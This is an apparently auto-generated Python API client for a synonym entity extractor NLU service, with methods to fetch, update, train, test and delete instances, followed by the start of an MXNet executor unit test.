all_params = ['instance_name', 'x_caller', 'index', 'len'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
if 'index' in params:
query_params.append(('index', params['index'])) # noqa: E501
if 'len' in params:
query_params.append(('len', params['len'])) # noqa: E501
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_training_samples(self, instance_name, **kwargs): # noqa: E501
"""Get training samples. # noqa: E501
Get the training samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_training_samples(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_training_samples_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_training_samples_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_training_samples_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get training samples. # noqa: E501
Get the training samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_training_samples_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller', 'index', 'len'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
if 'index' in params:
query_params.append(('index', params['index'])) # noqa: E501
if 'len' in params:
query_params.append(('len', params['len'])) # noqa: E501
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_retrieve(self, instance_name, text_input, **kwargs): # noqa: E501
"""Predict which entities was mentioned. # noqa: E501
Predict which entities was mentioned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_retrieve(instance_name, text_input, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TextInput text_input: The input text. (required)
:param str x_caller:
:return: list[SynonymEntity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_retrieve_with_http_info(instance_name, text_input, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_retrieve_with_http_info(instance_name, text_input, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_retrieve_with_http_info(self, instance_name, text_input, **kwargs): # noqa: E501
"""Predict which entities was mentioned. # noqa: E501
Predict which entities was mentioned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_retrieve_with_http_info(instance_name, text_input, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TextInput text_input: The input text. (required)
:param str x_caller:
:return: list[SynonymEntity]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'text_input', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_retrieve" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_retrieve`") # noqa: E501
# verify the required parameter 'text_input' is set
if ('text_input' not in params or
params['text_input'] is None):
raise ValueError("Missing the required parameter `text_input` when calling `synonym_entity_extractor_retrieve`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'text_input' in params:
body_params = params['text_input']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/retrieve', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymEntity]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_set_params(self, instance_name, model_params, **kwargs): # noqa: E501
"""Set the model parameters of named synonym entity extractor. # noqa: E501
Set the model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_set_params(instance_name, model_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param ModelParams model_params: The model parameters. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_set_params_with_http_info(instance_name, model_params, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_set_params_with_http_info(instance_name, model_params, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_set_params_with_http_info(self, instance_name, model_params, **kwargs): # noqa: E501
"""Set the model parameters of named synonym entity extractor. # noqa: E501
Set the model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_set_params_with_http_info(instance_name, model_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param ModelParams model_params: The model parameters. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'model_params', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_set_params" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_set_params`") # noqa: E501
# verify the required parameter 'model_params' is set
if ('model_params' not in params or
params['model_params'] is None):
raise ValueError("Missing the required parameter `model_params` when calling `synonym_entity_extractor_set_params`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'model_params' in params:
body_params = params['model_params']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/params', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_test(self, instance_name, test_details, **kwargs): # noqa: E501
"""Test the named synonym entity extractor. # noqa: E501
Test the named synonym entity extractor with the testing data already provided. Returns the details of the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_test(instance_name, test_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TestDetails test_details: The arguments provided to the test operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_test_with_http_info(instance_name, test_details, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_test_with_http_info(instance_name, test_details, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_test_with_http_info(self, instance_name, test_details, **kwargs): # noqa: E501
"""Test the named synonym entity extractor. # noqa: E501
Test the named synonym entity extractor with the testing data already provided. Returns the details of the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_test_with_http_info(instance_name, test_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TestDetails test_details: The arguments provided to the test operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'test_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_test" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_test`") # noqa: E501
# verify the required parameter 'test_details' is set
if ('test_details' not in params or
params['test_details'] is None):
raise ValueError("Missing the required parameter `test_details` when calling `synonym_entity_extractor_test`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'test_details' in params:
body_params = params['test_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/test', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_train(self, instance_name, train_details, **kwargs): # noqa: E501
"""Train the named synonym extractor. # noqa: E501
Train the named synonym extractor with the training and testing data already provided. Returns the updated instance details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_train(instance_name, train_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TrainDetails train_details: The arguments provided to the train operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_train_with_http_info(instance_name, train_details, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_train_with_http_info(instance_name, train_details, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_train_with_http_info(self, instance_name, train_details, **kwargs): # noqa: E501
"""Train the named synonym extractor. # noqa: E501
Train the named synonym extractor with the training and testing data already provided. Returns the updated instance details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_train_with_http_info(instance_name, train_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TrainDetails train_details: The arguments provided to the train operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'train_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_train" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_train`") # noqa: E501
# verify the required parameter 'train_details' is set
if ('train_details' not in params or
params['train_details'] is None):
raise ValueError("Missing the required parameter `train_details` when calling `synonym_entity_extractor_train`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'train_details' in params:
body_params = params['train_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/train', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_update_testing_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update testing samples by UUID. # noqa: E501
Update training samples of the named text classifier. A sample's UUIDs is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_testing_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUIDs is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_update_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_update_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_update_testing_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update testing samples by UUID. # noqa: E501
Update training samples of the named text classifier. A sample's UUIDs is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_testing_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUIDs is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_update_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_update_testing_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_update_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_update_training_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update training samples by UUID. # noqa: E501
Update training samples of the named text classifier. A sample's UUIDs is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_training_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUIDs is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_update_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_update_training_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_update_training_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update training samples by UUID. # noqa: E501
Update training samples of the named text classifier. A sample's UUIDs is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_training_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUIDs is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_update_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_update_training_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_update_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_vaporise(self, instance_name, **kwargs): # noqa: E501
"""Vaporise the named model. # noqa: E501
Permanently vaporises a model even if not trashed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_vaporise(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_vaporise_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_vaporise_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_vaporise_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Vaporise the named model. # noqa: E501
Permanently vaporises a model even if not trashed. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_vaporise_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_vaporise" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_vaporise`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/vaporise', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.336395
| 169
| 0.644236
|
b31bd3a4ad152944df16c494f522c348d647fdb7
| 4,813
|
py
|
Python
|
tests/python/unittest/test_executor.py
|
Liuxg16/BrainMatrix
|
0ec70edd4e12dd3719d20dd14d4e24438c60326f
|
[
"Apache-2.0"
] | 9
|
2018-06-12T12:12:56.000Z
|
2020-11-26T01:45:15.000Z
|
tests/python/unittest/test_executor.py
|
achao2013/mxnet-quantify
|
ae77c896da6db35530390e3cf8e524d553bba112
|
[
"Apache-2.0"
] | 1
|
2020-01-26T19:53:49.000Z
|
2020-01-26T19:53:49.000Z
|
tests/python/unittest/test_executor.py
|
achao2013/mxnet-quantify
|
ae77c896da6db35530390e3cf8e524d553bba112
|
[
"Apache-2.0"
] | 14
|
2016-11-18T07:21:41.000Z
|
2019-09-30T08:48:22.000Z
|
import numpy as np
import mxnet as mx
def reldiff(a, b):
diff = np.sum(np.abs(a - b))
norm = np.sum(np.abs(a))
reldiff = diff / norm
return reldiff
def check_bind_with_uniform(uf, gf, dim, sf=None, lshape=None, rshape=None):
"""check function consistency with uniform random numbers"""
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
lhs = mx.symbol.Variable('lhs')
rhs = mx.symbol.Variable('rhs')
if sf is not None:
ret = sf(lhs, rhs)
else:
ret = uf(lhs, rhs)
assert ret.list_arguments() == ['lhs', 'rhs']
lshape = shape if lshape is None else lshape
rshape = shape if rshape is None else rshape
lhs_arr = mx.nd.array(np.random.uniform(-1, 1, lshape))
rhs_arr = mx.nd.array(np.random.uniform(-1, 1, rshape))
lhs_grad = mx.nd.empty(lshape)
rhs_grad = mx.nd.empty(rshape)
executor = ret.bind(mx.Context('cpu'),
args=[lhs_arr, rhs_arr],
args_grad=[lhs_grad, rhs_grad])
exec3 = ret.bind(mx.Context('cpu'),
args=[lhs_arr, rhs_arr])
exec4 = ret.bind(mx.Context('cpu'),
args={'rhs': rhs_arr, 'lhs': lhs_arr},
args_grad={'lhs': lhs_grad, 'rhs': rhs_grad})
executor.forward()
exec3.forward()
exec4.forward()
out2 = executor.outputs[0].asnumpy()
out1 = uf(lhs_arr.asnumpy(), rhs_arr.asnumpy())
